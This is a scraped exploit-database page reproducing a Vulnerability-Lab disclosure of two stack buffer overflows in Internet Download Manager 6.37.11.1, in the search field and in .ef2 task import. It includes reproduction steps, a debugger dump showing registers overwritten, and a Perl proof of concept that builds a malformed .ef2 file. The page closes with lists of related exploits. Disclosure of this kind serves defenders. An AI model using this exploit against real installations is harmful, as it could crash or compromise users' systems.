To access the dashboard, Schedule scans, API and Search become a patron

Search for hundreds of thousands of exploits

"Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC)"

Author

Exploit author

Vulnerability-Lab

Platform

Exploit platform

windows

Release date

Exploit published date

2020-04-29

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
# Title: Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC)
# Author: Vulnerability Laboratory
# Date: 2020-04-28
# Vendor: https://www.internetdownloadmanager.com
# Software: https://www.internetdownloadmanager.com/download.html
# CVE: N/A

Document Title:
===============
Internet Download Manager v6.37.11.1 - Stack Buffer Overflow Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2236


Common Vulnerability Scoring System:
====================================
7.1


Vulnerability Disclosure Timeline:
==================================
2020-04-28: Public Disclosure (Vulnerability Laboratory)
(Copy of the Homepage:
https://www.internetdownloadmanager.com/support/about_us.html )
(Sofwtare Product: https://www.internetdownloadmanager.com/download.html)


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Technical Details & Description:
================================
Multiple stack buffer overflow vulnerabilities has been discovered in
the official Internet Download Manager v6.37.11.1 software.
The bufer overflow allows to overwrite registers of the process to
compromise the file-system by elevates local process privileges.

1.1
The first stack buffer overflow is located in the `search` function of
the downloads menu. The search function itself does not use
any secure restriction in the requested search variable of the inputs.
Local attackers with access to the software are able to overflow
the registers to elevate local process privileges. Thus allows a local
attacker to compromise the local computer- or file-system.

1.2
The second stack buffer overflow is located in the `Export/Import`
function of the tasks menu. Local users are able to import and
export the download tasks as *.ef2 file. Local attackers are able to
import manipulated *.ef2 files with manipulated referer and
source url to overwrite the eip register. The issue occurs because of
the insufficient ef2 filetype (context) validation process
that does not perform any length restrictions.

The security risk of the local stack buffer overflow vulnerabilities in
the software are estimated as high with a cvss count of 7.1.
Exploitation of the buffer overflow vulnerability requires a low
privilege or restricted system user account without user interaction.
Successful exploitation of the vulnerability results in overwrite of the
active registers to compromise of the computer system or process.

Vulnerable Module(s):
[+] Search
[+] Import/Export (ef2)


Proof of Concept (PoC):
=======================
1.1
The stack buffer overflow vulnerability can be exploited by local
attackers with system user privileges without user interaction.
For security demonstration or to reproduce the local vulnerability
follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Open the software
2. Click the downloads menu and open the search
3. Inject a large unicode payload inside the search input field and transmit
4. The software crashs with several uncaught exception because of
overwritten register (0168D8F0)
5. Successful reproduce of the local buffer overflow vulnerability!


--- Debug Logs (0168D8F0) ---
00d61850 668b08          mov     cx,word ptr [eax]        ds:002b:41414141
-
00D6186D  |. 56             PUSH ESI                                 ; /Arg1
-
00D61882  |. E8 59FFFFFF    CALL IDMan.00D617E0                      ;
IDMan.00D617E0
-
00D6189B  |> 50             PUSH EAX                                 ; /Arg1
-
00D6189E  |. E8 3DFFFFFF    CALL IDMan.00D617E0                      ;
IDMan.00D617E0
-
Call stack
 Address=0168C79C
 Stack=00DFE0F2
 Procedure / arguments=IDMan.00D617E0
 Called from=IDMan.00DFE0ED
 Frame=0168E02C
-
SEH chain
Address    SE handler
0168C790   IDMan.00F751E8
0168D8F0   41414141
-
EAX 41414141
ECX 01680000
EDX 41414141
EBX 00000001
ESP 0168C76C
EBP 0168E02C UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
ESI 0168C7AC UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
EDI 00410043
EIP 00D61850 IDMan.00D61850
Executable modules
 Base=00D60000
 Size=00539000 (5476352.)
 Entry=00F5CB1C IDMan.<ModuleEntryPoint>
 Name=IDMan
 File version=6, 37, 11, 2
 Path=C:Program Files (x86)Internet Download ManagerIDMan.exe


1.2
The stack buffer overflow vulnerability can be exploited by local
attackers with system user privileges without user interaction.
For security demonstration or to reproduce the local vulnerability
follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Open the software
2. Start the bof_poc.pl
3. Open the tasks menu
4. Click import and import *.ef2 poc
Note: The software process crashs on import with uncaught exception
5. Successful reproduce of the local buffer overflow vulnerability!


Usage Example: Export/Import (*.ef2)
<
https://www.vulnerability-lab.com/download_content.php?id=1337
referer: https://www.vulnerability-lab.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
>


PoC: Exploit
#!/usr/bin/perl
# Local Stack Buffer Overflow Exploit for Internet Download Manager
v6.37.11.1
# Vulnerability Laboratory - Benjamin Kunz Mejri
my $poc = "bof_poc.ef2" ;
print "[+] Producing bof_poc.ef2 ..." ;
my $buff0=" "."<" x 1;
my $buff1=" n https://"."A" x 1024;
my $buff2=" n Referer:"."A" x 1024;
my $buff3=" n User Agent:"."A" x 1024;
my $buff4=" n ".">" x 1;
open(ef2, ">>$poc") or die "Cannot open $poc";
print ef2 $buff0;
print ef2 $buff1;
print ef2 $buff2;
print ef2 $buff3;
print ef2 $buff4;
close(ef2);
print "n[+] done !";


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2020-11-23 "VTiger v7.0 CRM - 'To' Persistent XSS" webapps php Vulnerability-Lab
2020-11-17 "WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting" webapps php Vulnerability-Lab
2020-11-17 "Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting" webapps php Vulnerability-Lab
2020-11-17 "SugarCRM 6.5.18 - Persistent Cross-Site Scripting" webapps php Vulnerability-Lab
2020-05-13 "Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting" webapps php Vulnerability-Lab
2020-05-13 "Tryton 5.4 - Persistent Cross-Site Scripting" webapps php Vulnerability-Lab
2020-05-11 "Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting" webapps php Vulnerability-Lab
2020-05-11 "OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting" webapps php Vulnerability-Lab
2020-05-07 "Draytek VigorAP 1000C - Persistent Cross-Site Scripting" webapps hardware Vulnerability-Lab
2020-05-05 "Fishing Reservation System 7.5 - 'uid' SQL Injection" webapps php Vulnerability-Lab
2020-05-01 "Super Backup 2.0.5 for iOS - Directory Traversal" webapps ios Vulnerability-Lab
2020-05-01 "HardDrive 2.1 for iOS - Arbitrary File Upload" webapps ios Vulnerability-Lab
2020-04-29 "Easy Transfer 1.7 for iOS - Directory Traversal" webapps ios Vulnerability-Lab
2020-04-29 "Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC)" local windows Vulnerability-Lab
2020-04-23 "Sky File 2.1.0 iOS - Directory Traversal" webapps ios Vulnerability-Lab
2020-04-22 "Mahara 19.10.2 CMS - Persistent Cross-Site Scripting" webapps linux Vulnerability-Lab
2020-04-20 "Fork CMS 5.8.0 - Persistent Cross-Site Scripting" webapps php Vulnerability-Lab
2020-04-17 "TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection" webapps php Vulnerability-Lab
2020-04-17 "Playable 9.18 iOS - Persistent Cross-Site Scripting" webapps ios Vulnerability-Lab
2020-04-15 "File Transfer iFamily 2.1 - Directory Traversal" webapps ios Vulnerability-Lab
2020-04-15 "SeedDMS 5.1.18 - Persistent Cross-Site Scripting" webapps php Vulnerability-Lab
2020-04-15 "Macs Framework 1.14f CMS - Persistent Cross-Site Scripting" webapps php Vulnerability-Lab
2020-04-15 "AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting" webapps ios Vulnerability-Lab
2020-04-15 "SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting" webapps ios Vulnerability-Lab
2019-12-19 "Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation" webapps hardware Vulnerability-Lab
2019-08-14 "TortoiseSVN 1.12.1 - Remote Code Execution" webapps windows Vulnerability-Lab
2018-01-23 "CentOS Web Panel 0.9.8.12 - 'row_id' / 'domain' SQL Injection" webapps php Vulnerability-Lab
2018-01-21 "CentOS Web Panel 0.9.8.12 - Multiple Vulnerabilities" webapps php Vulnerability-Lab
2018-01-21 "Shopware 5.2.5/5.3 - Cross-Site Scripting" webapps json Vulnerability-Lab
2018-01-15 "Flash Operator Panel 2.31.03 - Command Execution" webapps php Vulnerability-Lab
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48397/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.